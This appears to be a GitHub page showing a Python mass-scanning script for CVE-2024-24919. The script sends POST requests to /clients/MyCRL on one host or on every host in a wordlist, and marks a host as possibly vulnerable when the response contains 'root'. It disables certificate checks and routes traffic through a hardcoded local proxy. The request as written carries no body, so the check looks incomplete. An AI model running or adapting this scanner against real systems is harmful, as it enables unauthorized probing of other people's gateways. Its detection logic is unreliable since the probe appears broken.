-
Notifications
You must be signed in to change notification settings - Fork 0
/
CVE-2024-24919.py
76 lines (67 loc) · 2.24 KB
/
CVE-2024-24919.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
import argparse, requests, urllib3, os, platform, ctypes
from colorama import Fore, Style, init
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
init()
r = Fore.RED + Style.BRIGHT
g = Fore.GREEN + Style.BRIGHT
y = Fore.YELLOW + Style.BRIGHT
b = Fore.BLACK + Style.BRIGHT
o = Fore.RESET + Style.RESET_ALL
banner = """
______ ______
/ ___/ | / / __/
/ /__ | |/ / _/-2024-24919
\\___/ |___/___/
0xans
"""
tries = 0
vuln = 0
notvuln = 0
def refresh(status):
ctypes.windll.kernel32.SetConsoleTitleW(status)
def scan(host):
global tries, vuln, notvuln
url = f'http://{host}/clients/MyCRL'
headers = {
'Host': host,
'Content-Type': 'application/x-www-form-urlencoded',
'Connection': 'keep-alive'
}
status = f"Scanned : {tries} | Vulnerable: {vuln} | Not Vulnerable: {notvuln}"
try:
response = requests.post(url, headers=headers, verify=False, proxies=proxies, allow_redirects=False)
tries += 1
#print(f'{b}[{tries}]{y} Scanning: {o}{host}')
if 'root' in response.text:
print(f"{g}[+] host: {host} - Maybe Vulnerable{o}")
vuln += 1
else:
#print(f"{r}[-] host: {host} - Not Vulnerable{o}")
notvuln += 1
refresh(status)
except Exception as e:
result = f"{y}host: {host} - Error: {str(e)}{o}"
refresh(status)
except KeyboardInterrupt:
return
def main():
global tries, vuln, notvuln
parser = argparse.ArgumentParser(description='Tool to find potential CVE-2024-24919 by 0x.ans')
parser.add_argument('-x', required=False, help='The target domain.')
parser.add_argument('-w', required=False, help='URLs Wordlist.')
args = parser.parse_args()
if args.x:
scan(args.x)
elif args.w:
with open(args.w, 'r') as file:
for line in file:
host = line.strip()
if host:
scan(host)
else:
parser.print_help()
if __name__ == '__main__':
os.system('cls' if os.name == 'nt' else 'clear')
print(b + banner + o)
main()